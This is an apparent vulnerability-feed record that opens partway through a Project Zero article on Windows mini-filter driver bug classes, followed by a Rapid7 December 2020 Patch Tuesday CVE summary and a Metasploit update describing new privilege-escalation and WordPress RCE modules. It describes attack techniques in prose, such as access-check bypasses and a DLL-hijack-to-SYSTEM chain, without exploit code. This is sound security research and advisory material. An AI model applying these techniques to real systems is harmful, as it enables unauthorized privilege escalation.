| 0 | C:\Windows\System32\license.rtf | CreateFile | SUCCESS | Desired Access: Read Data, Write Data |
| 1 | C:\Windows\System32\license.rtf | SetEndOfFile | SUCCESS | EndOfFile: 0 |
| 2 | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | WriteFile | SUCCESS | Offset: 0, Length: 68 |
| 3 | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CloseFile | SUCCESS | |

I’ve added an ID column which indicates the event taking place. The events match the code for creating the EICAR file: we open the file for read and write access, set the length to 0, write the EICAR string and then close the file. Note that in event ID 2 the path to the file has changed from the original one in system32 to the virtual store.
This is because the file is “delay virtualized” so it’ll only be created if a write IO request, such as changing the file length, is dispatched to the file.

Now let’s compare the events when the altitude is set to 100:

| ID | Path | Operation | Result | Detail |
|---|---|---|---|---|
| 0 | C:\Windows\System32\license.rtf | CreateFile | ACCESS DENIED | Desired Access: Read Data, Write Data |
| | C:\Windows\System32\license.rtf | CreateFile | SUCCESS | Desired Access: Read Data |
| 1 | C:\Windows\System32\license.rtf | CreateFile | SUCCESS | Desired Access: Read Data, Read Attributes |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CreateFile | SUCCESS | Desired Access: Write Data, Write Attributes |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | SetEndOfFile | SUCCESS | EndOfFile: 538 |
| | C:\Windows\System32\license.rtf | ReadFile | SUCCESS | Offset: 0, Length: 538 |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | WriteFile | SUCCESS | Offset: 0, Length: 538 |
| | C:\Windows\System32\license.rtf | ReadFile | END OF FILE | Offset: 538, Length: 16,384 |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CloseFile | SUCCESS | |
| | C:\Windows\System32\license.rtf | CloseFile | SUCCESS | |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CreateFile | SUCCESS | Desired Access: Read Data, Write Data |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | SetEndOfFile | SUCCESS | EndOfFile: 0 |
| 2 | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | WriteFile | SUCCESS | Offset: 0, Length: 68, Priority: Normal |
| 3 | C:\Windows\System32\license.rtf | CloseFile | SUCCESS | |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CloseFile | SUCCESS | |

You can see that the list of events is much longer in the second case (I’ve even removed some for brevity). For event 0 it’s no longer a single create IO request for the license.rtf file. As the user doesn’t have write access when the create call is made to the file system it results in an ACCESS DENIED error. The LUAFV driver sees the error in its post-create callback and as virtualization is enabled it makes a second create for only read access. This second create succeeds. Due to the altitude of LUAFV this process is normally hidden from the Process Monitor.

In the first table event ID 2 we saw the caller setting the file length to 0. However in the second table we now see that the virtual file needs to be created and the contents of the original file are copied into the new virtual file. Only after that operation has been completed will the length of the file be set to 0. The last 2 events are more or less the same.

I hope this is a clear demonstration both of how the altitude directly affects the operation of mini-filter drivers as well as how much file information you might be missing in Process Monitor without realizing it.

### Concurrency and Reentrancy

The IO manager is designed to operate asynchronously. It’s possible that multiple threads could be calling into the same IO driver at the same time and the filter manager is no different. There’s no explicit locking in the filter manager which would prevent multiple IO requests being dispatched at the same time to the same file object.
This can lead to concurrency and reentrancy issues.\n\nThe filter driver can assign shared state based on the file stream or file object. This can be extracted in the filter when operating on the file and used to store and retrieve the current state information. If you dispatch multiple IO requests to the same file it can result in an invalid state or memory corruption issues.\n\nAn example of this kind of issue is [CVE-2019-0836](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1774>) which was a race condition in the LUAFV driver related to handling of the [SECTION_OBJECT_POINTERS](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_section_object_pointers>) structure in the file object. Basically by racing a read against a write IO request on the same file it was possible to get the wrong SECTION_OBJECT_POINTERS structure assigned to the virtual file allowing a normal user to bypass access checks and map a read-only file as writable.\n\nTo solve this problem the driver needs to not maintain complex state between pre and post operation callbacks or over any calls out to any API which could be trapped by a user-mode application. \n\n### Incorrect Forwarding of IO Operations\n\nWe showed earlier how to retarget an IO operation to another file object by switching the TargetFileObject pointer. This needs to be done very carefully as when working with file object pointers directly almost any operation can be performed on them. For example, if a file is opened read-only a write operation can still be dispatched to the file object itself and it\u2019ll succeed.\n\nThe only thing which prevents a user-mode application from doing this is the kernel checks that the handle passed by the application to the NtWriteFile system call has the FILE_WRITE_DATA access right set. If not the system call can return STATUS_ACCESS_DENIED. 
However, if the handle has write access to a file object, but the filter driver redirects that operation to a read-only file then the check is bypassed and the user can write to a file they don\u2019t necessarily control.\n\nAnother place this can happen is the dispatch of IO control codes. Each control code has a flag which indicates if the file handle requires read and/or write access to be dispatched. This check is performed in the IO manager before the request ever makes it to the file system. If the filter drivers blindly forward IO control codes to a separate file it could send a code which normally requires write access on the handle bypassing security checks.\n\nThe LUAFV driver is a good example of a mini-filter driver where this forwarding takes place. The previously mentioned issue, CVE-2019-0836 while it\u2019s a concurrency issue also relies on the fact that the file object can be written to even though it was opened read-only.\n\n## Summary\n\nIn summary I think that mini-filter drivers are an under-appreciated source of privilege escalation bugs on Windows. In part that\u2019s because they\u2019re not easy to understand. They have complex interactions with the rest of the IO system which makes understanding difficult but can introduce really subtle and interesting issues. I hope I\u2019ve given you enough information to better understand how mini-filter drivers function, how you communicate with them and what sorts of unique bug classes you might discover.\n\nIf you want some more information a good blog on the inner workings of filters drivers is [Of Filesystems and Other Demons](<http://fsfilters.blogspot.com/>). It\u2019s not been updated in a long while but it still contains some valuable information. 
You can also refer to [MSDN](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/filter-manager-concepts>) which has a fairly comprehensive section on mini-filters as well as the [Windows Driver Kit sample code](<https://github.com/microsoft/Windows-driver-samples/tree/master/filesys/miniFilter>). Finally as a reminder I\u2019ve uploaded a filter manager [header file](<https://gist.github.com/tyranid/49d8a1b9e53bba4eac40df32e15d4a98>) for use in reverse engineering tools such as IDA Pro.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-01-14T00:00:00", "type": "googleprojectzero", "title": "\nHunting for Bugs in Windows Mini-Filter Drivers\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0877", "CVE-2019-0836", "CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136", "CVE-2020-17139"], "modified": "2021-01-14T00:00:00", "id": "GOOGLEPROJECTZERO:1D4D205F47235FA1B34F16AE73563B14", "href": "https://googleprojectzero.blogspot.com/2021/01/hunting-for-bugs-in-windows-mini-filter.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": 
"2020-12-12T10:47:13", "description": "\n\nWe close off our 2020 year of Patch Tuesdays with 58 vulnerabilities being addressed. While it's a higher count than our typical December months (high thirties), it's still a nice breath of fresh air given how the past year has been. We do, however, get to celebrate that none of the reported vulnerabilities covered this month has been publicly exploited nor previously publicly disclosed and only 9 of the 58 vulnerabilities have been marked as Critical by Microsoft.\n\nIn terms of actionables, standard procedures can be followed here in terms of how to prioritize which sets of patches to apply first with two exceptions.\n\n## Microsoft Office vulnerabilities\n\nA fair amount of remote code executions targeting Microsoft Excel are being patched up today and while none of them have the Preview Pane set as an attack vector, the volume of remote code execution vulnerabilities pertaining to Microsoft Office this month may suggest a slight re-jig of priorities. That's our first (minor) exception.\n\nThe next exception is likely the most notable piece behind this December 2020 Patch Tuesday: Microsoft Exchange Server.\n\n## Microsoft Exchange Server vulnerabilities\n\nWhile there are a total of six vulnerabilities from Microsoft Exchange Server this month, two of them garner a CVSS score of 9.1 ([CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>), [CVE-2020-17142](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17142>)) and one is noted by Microsoft as having a higher chance of exploitability ([CVE-2020-17144](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144>)). 
These three warrant an additional examination and may be grounds for prioritizing patching.\n\nThere is currently suspicion that [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) helps address the patch bypass of [CVE-2020-16875](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16875>) (CVSS 8.4) from September 2020. As well, both [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) and [CVE-2020-17142](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17142>) are remote code execution vulnerabilities occurring due to improper validation of cmdlet arguments that affect all supported (as of writing) versions of Microsoft Exchange. One important note is that while these vulnerabilities have received a CVSS score of 9.1 and do not require additional user interaction, an attacker must be in an authenticated role in order to exploit them.\n\nIn contrast, [CVE-2020-17144](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144>), another remote code execution vulnerability also stemming from improper validation of cmdlet arguments, only affects Exchange Server 2010 SP3 and does require additional user interaction to successfully execute. This is extra interesting as [Microsoft Exchange Server 2010 passed end of life back on October 22, 2020](<https://techcommunity.microsoft.com/t5/exchange-team-blog/microsoft-extending-end-of-support-for-exchange-server-2010-to/ba-p/753591>). 
The introduction of this post-EOL patch for Microsoft Exchange Server 2010 coupled with Microsoft noting this vulnerability to be more likely exploitable does suggest prioritizing this patch a bit earlier.\n\n## New Summary Tables\n\nIn an attempt to provide a bit more summarizing tables, here are this month's patched vulnerabilities split by the product family.\n\n### Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17160>) | Azure Sphere Security Feature Bypass Vulnerability | False | False | 7.4 | True \n[CVE-2020-16971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16971>) | Azure SDK for Java Security Feature Bypass Vulnerability | False | False | 7.4 | False \n \n### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17153](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17153>) | Microsoft Edge for Android Spoofing Vulnerability | False | False | 4.3 | True \n[CVE-2020-17131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17131>) | Chakra Scripting Engine Memory Corruption Vulnerability | False | False | 4.2 | False \n \n### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17148>) | Visual Studio Code Remote Development Extension Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17150](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17150>) | Visual Studio Code Remote Code Execution Vulnerability | False | False | 7.8 | False 
\n[CVE-2020-17156](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17156>) | Visual Studio Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17159>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | False | False | 7.8 | False \n[CVE-2020-17002](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17002>) | Azure SDK for C Security Feature Bypass Vulnerability | False | False | 7.4 | False \n[CVE-2020-17135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17135>) | Azure DevOps Server Spoofing Vulnerability | False | False | 6.4 | False \n[CVE-2020-17145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17145>) | Azure DevOps Server and Team Foundation Services Spoofing Vulnerability | False | False | 5.4 | False \n \n### ESU Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17140](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17140>) | Windows SMB Information Disclosure Vulnerability | False | False | 8.1 | True \n[CVE-2020-16958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16958>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16959>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16960>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16961>) | Windows Backup 
Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16962>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16963>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16964>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17098>) | Windows GDI+ Information Disclosure Vulnerability | False | False | 5.5 | True \n \n### Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17132>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 9.1 | True \n[CVE-2020-17142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17142>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 9.1 | True \n[CVE-2020-17143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17143>) | Microsoft Exchange Information Disclosure Vulnerability | False | False | 8.8 | True \n[CVE-2020-17141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17141>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 8.4 | True \n[CVE-2020-17144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17144>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 8.4 | True 
\n[CVE-2020-17117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17117>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 6.6 | False \n \n### Microsoft Dynamics Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17152](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17152>) | Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17158>) | Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17147>) | Dynamics CRM Webclient Cross-site Scripting Vulnerability | False | False | 8.7 | True \n[CVE-2020-17133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17133>) | Microsoft Dynamics Business Central/NAV Information Disclosure | False | False | 6.5 | True \n \n### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17121>) | Microsoft SharePoint Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>) | Microsoft SharePoint Remote Code Execution Vulnerability | False | False | 8.1 | False \n[CVE-2020-17115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17115>) | Microsoft SharePoint Spoofing Vulnerability | False | False | 8 | True \n[CVE-2020-17122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17122>) | 
Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17123>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17124](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17124>) | Microsoft PowerPoint Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17125>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17127>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17128>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17129>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17089>) | Microsoft SharePoint Elevation of Privilege Vulnerability | False | False | 7.1 | False \n[CVE-2020-17119](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17119>) | Microsoft Outlook Information Disclosure Vulnerability | False | False | 6.5 | True \n[CVE-2020-17130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17130>) | Microsoft Excel Security Feature Bypass Vulnerability | False | False | 6.5 | True \n[CVE-2020-17126](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17126>) | Microsoft Excel Information Disclosure Vulnerability | False | False | 5.5 | True 
\n[CVE-2020-17120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17120>) | Microsoft SharePoint Information Disclosure Vulnerability | False | False | 5.3 | True \n \n### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17095>) | Hyper-V Remote Code Execution Vulnerability | False | False | 8.5 | True \n[CVE-2020-17092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17092>) | Windows Network Connections Service Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17134>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17136](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17136>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17137>) | DirectX Graphics Kernel Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17139>) | Windows Overlay Filter Security Feature Bypass Vulnerability | False | False | 7.8 | False \n[CVE-2020-17096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17096>) | Windows NTFS Remote Code Execution Vulnerability | False | False | 7.5 | True \n[CVE-2020-17103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17103>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7 | False 
\n[CVE-2020-17099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17099>) | Windows Lock Screen Security Feature Bypass Vulnerability | False | False | 6.8 | True \n[CVE-2020-16996](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16996>) | Kerberos Security Feature Bypass Vulnerability | False | False | 6.5 | True \n[CVE-2020-17094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17094>) | Windows Error Reporting Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17138](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17138>) | Windows Error Reporting Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17097](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17097>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | False | False | 3.3 | False \n \n## Summary Graphs\n\n", "cvss3": {}, "published": "2020-12-08T21:36:27", "type": "rapid7blog", "title": "Patch Tuesday - December 2020", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-16875", "CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16971", "CVE-2020-16996", "CVE-2020-17002", "CVE-2020-17089", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17103", "CVE-2020-17115", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17119", "CVE-2020-17120", "CVE-2020-17121", "CVE-2020-17122", "CVE-2020-17123", "CVE-2020-17124", "CVE-2020-17125", "CVE-2020-17126", "CVE-2020-17127", "CVE-2020-17128", "CVE-2020-17129", "CVE-2020-17130", "CVE-2020-17131", "CVE-2020-17132", "CVE-2020-17133", "CVE-2020-17134", "CVE-2020-17135", "CVE-2020-17136", "CVE-2020-17137", "CVE-2020-17138", "CVE-2020-17139", "CVE-2020-17140", "CVE-2020-17141", 
"CVE-2020-17142", "CVE-2020-17143", "CVE-2020-17144", "CVE-2020-17145", "CVE-2020-17147", "CVE-2020-17148", "CVE-2020-17150", "CVE-2020-17152", "CVE-2020-17153", "CVE-2020-17156", "CVE-2020-17158", "CVE-2020-17159", "CVE-2020-17160"], "modified": "2020-12-08T21:36:27", "id": "RAPID7BLOG:99D9180FBF3F900ADB0CDC5EF79EC080", "href": "https://blog.rapid7.com/2020/12/08/patch-tuesday-december-2020/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T20:57:23", "description": "## Commemorating the 2020 December Metasploit community CTF\n\n\n\nA new commemorative banner has been added to the Metasploit console to celebrate the teams that participated in the [2020 December Metasploit community CTF](<https://blog.rapid7.com/2020/12/07/congrats-to-the-winners-of-the-2020-december-metasploit-community-ctf/>) and achieved 100 or more points:\n\n\n\nIf you missed out on participating in this most recent event, be sure to follow the [Metasploit Twitter](<https://twitter.com/metasploit>) and [Metasploit blog posts](<https://blog.rapid7.com/tag/metasploit/>). If there are any future Metasploit CTF events, all details will be announced there!\n\nIf the banners aren\u2019t quite your style, you can always disable them with the `quiet` flag:\n \n \n msfconsole -q\n \n\n## Windows privilege escalation via Cloud Filter driver\n\nOur very own [gwillcox-r7](<https://github.com/gwillcox-r7>) has created a new module for [CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP](<https://github.com/rapid7/metasploit-framework/pull/14585>), with credit to James Foreshaw for the initial vulnerability discovery and proof of concept. The Cloud Filter driver, `cldflt.sys`, on Windows 10 v1803 and later, prior to December 2020, did not set the `IO_FORCE_ACCESS_CHECK` or `OBJ_FORCE_ACCESS_CHECK` flags when calling `FltCreateFileEx()` and `FltCreateFileEx2()` within its `HsmpOpCreatePlaceholders()` function with attacker-controlled input. 
This meant that files were created with `KernelMode` permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in.\n\nThis module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate the `SYSTEM` user.\n\n## New Modules (3)\n\n * [WordPress AIT CSV Import Export Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14572>) by h00die This adds an exploit module for various versions of the `AIT CSV Import / Export` plugin for Wordpress. This module exploits an unauthenticated file upload vulnerability in plugin versions below `v3.0.4` to gain code execution against Wordpress installations.\n * [CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP](<https://github.com/rapid7/metasploit-framework/pull/14585>) by Grant Willcox and James Foreshaw, which exploits [CVE-2020-17136](<https://attackerkb.com/topics/1yvp3hVNSN/cve-2020-17136?referrer=blog>), an arbitrary file write vulnerability within cldflt.sys. The result yields local code execution as the Network Service account which is suitable for escalating to SYSTEM via documented techniques.\n * [Windows Manage Volume Shadow Copies](<https://github.com/rapid7/metasploit-framework/pull/14582>) by [zeroSteiner](<https://github.com/zeroSteiner>) This adds the possibility to run post module actions as commands. 
This also consolidates and improves existing VSS modules into one new single module with multiple actions.\n\n## Enhancements and Features\n\n * [#14562](<https://github.com/rapid7/metasploit-framework/pull/14562>) from [zeroSteiner](<https://github.com/zeroSteiner>) Improves the readability of Meterpreter error messages by replacing the command ID with the command name\n * [#14582](<https://github.com/rapid7/metasploit-framework/pull/14582>) from [zeroSteiner](<https://github.com/zeroSteiner>) This adds the possibility to run post module actions as commands. This also consolidates and improves existing VSS modules into one new single module with multiple actions.\n * [#14600](<https://github.com/rapid7/metasploit-framework/pull/14600>) from [zeroSteiner](<https://github.com/zeroSteiner>) The FileSystem mixin has been reorganized and a number of function aliases have been added to assist developers in using the module. Additionally new YARD documentation has been added to better explain the functionality of several of the FileSystem mixin's functions to assist developers in determining when to use these functions.\n * [#14606](<https://github.com/rapid7/metasploit-framework/pull/14606>) from [bwatters-r7](<https://github.com/bwatters-r7>) This adds a banner commemorating all of the teams that participated in the Q4 2020 CTF.\n\n## Bugs Fixed\n\n * [#14515](<https://github.com/rapid7/metasploit-framework/pull/14515>) from [timwr](<https://github.com/timwr>) This fixes an issue with both cmd/unix/reverse_awk and cmd/unix/bind_awk payloads that were not correctly terminating after a session was closed. 
This was causing endless session creations and high CPU consumption on the target.\n * [#14605](<https://github.com/rapid7/metasploit-framework/pull/14605>) from [zeroSteiner](<https://github.com/zeroSteiner>) This PR fixes an issue where the `VHOST` option was not being correctly populated when the `RHOST` option was a domain name\n * [#14613](<https://github.com/rapid7/metasploit-framework/pull/14613>) from [adfoster-r7](<https://github.com/adfoster-r7>) Fixes a regression error with modules depending on NTLM such as cve_2019_0708_bluekeep\n * [#14614](<https://github.com/rapid7/metasploit-framework/pull/14614>) from [zeroSteiner](<https://github.com/zeroSteiner>) A bug within the module for [CVE-2020-17136](<https://attackerkb.com/topics/1yvp3hVNSN/cve-2020-17136?referrer=blog>) occurred where a relative path was used instead of an absolute path when attempting to load the C# exploit exe. The code has been replaced with a call to `File.expand_path()` to allow the module to dynamically determine the full path to this file, allowing users to use the module regardless of which directory they are in when running `msfconsole`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.25...6.0.26](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-01-07T10%3A58%3A16%2B00%3A00..2021-01-14T17%3A51%3A07%2B00%3A00%22>)\n * [Full diff 6.0.25...6.0.26](<https://github.com/rapid7/metasploit-framework/compare/6.0.25...6.0.26>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
